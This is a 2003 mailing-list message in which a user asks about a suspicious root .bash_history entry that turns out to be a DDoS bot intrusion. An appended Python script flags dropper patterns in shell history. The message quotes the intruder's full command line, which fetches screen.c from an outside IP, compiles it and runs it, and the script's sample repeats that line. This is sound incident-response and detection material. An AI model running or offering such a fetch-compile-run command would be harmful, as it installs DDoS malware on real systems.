On Thu, 2003-04-24 at 15:45, Matt Stamm wrote:
Gideon,
I checked .bash_history as you suggested and found an interesting entry. This entry was in .bash_history in the 'root' directory.
cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
I'm new at this, but based on a little research, am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it? Is this correct? I looked at the source for 'screen.c' and in the title it says...
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem
Doesn't look good, does it? Is anyone familiar with this?
The IP points to "dailygrind.pciwest.net"
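
Added example, not part of the original message: a small Python triage script that breaks a shell-history line into its commands and flags the fetch, compile and run sequence seen in the entry above. The sample lines are constructed (using a documentation address), and the tag names and the is_dropper() rule are this example's own assumptions.

```python
import shlex

TEMP_DIRS = {"/tmp", "/var/tmp", "/dev/shm"}   # world-writable staging dirs
FETCHERS = {"wget", "curl"}
COMPILERS = {"gcc", "cc"}

def analyze(line):
    """Return (tag, detail) findings for one shell-history line."""
    findings, built = [], set()
    for part in line.split(";"):       # naive split, enough for history triage
        try:
            argv = shlex.split(part)
        except ValueError:             # unbalanced quotes: fall back
            argv = part.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        name = cmd[2:] if cmd.startswith("./") else cmd
        if cmd == "cd" and args and args[0].rstrip("/") in TEMP_DIRS:
            findings.append(("cd-temp", args[0]))
        elif cmd in FETCHERS:
            for a in args:
                if a.startswith(("http://", "https://", "ftp://")):
                    findings.append(("download", a))
        elif cmd == "export":
            # "." in PATH makes a bare command name resolve to a file in
            # the current directory ahead of the system binary.
            for a in args:
                if a.startswith("PATH=") and "." in a[5:].split(":"):
                    findings.append(("path-dot", a))
        elif cmd in COMPILERS and "-o" in args[:-1]:
            out = args[args.index("-o") + 1]
            built.add(out)
            findings.append(("compile", out))
        elif name in built:
            findings.append(("exec-built", cmd))
    return findings

def is_dropper(line):
    """True when a line stages in a temp dir, downloads, compiles and runs."""
    tags = {t for t, _ in analyze(line)}
    return {"cd-temp", "download", "compile", "exec-built"} <= tags

# Constructed samples: one modelled on the entry above, one ordinary build.
SAMPLE = (r'cd /var/tmp;if [ -f screen.c ];then(exit);fi;'
          r'wget -O screen.c http://192.0.2.10/screen.c;'
          r'export PATH=.:/usr/bin:$PATH;'
          r'gcc -o screen screen.c -DEXTERNAL_BASE="\"192.0.2.10\"";screen;exit;')
BENIGN = "cd /usr/src/app;gcc -o app main.c;./app"

if __name__ == "__main__":
    for tag, detail in analyze(SAMPLE):
        print(f"{tag:11} {detail}")
```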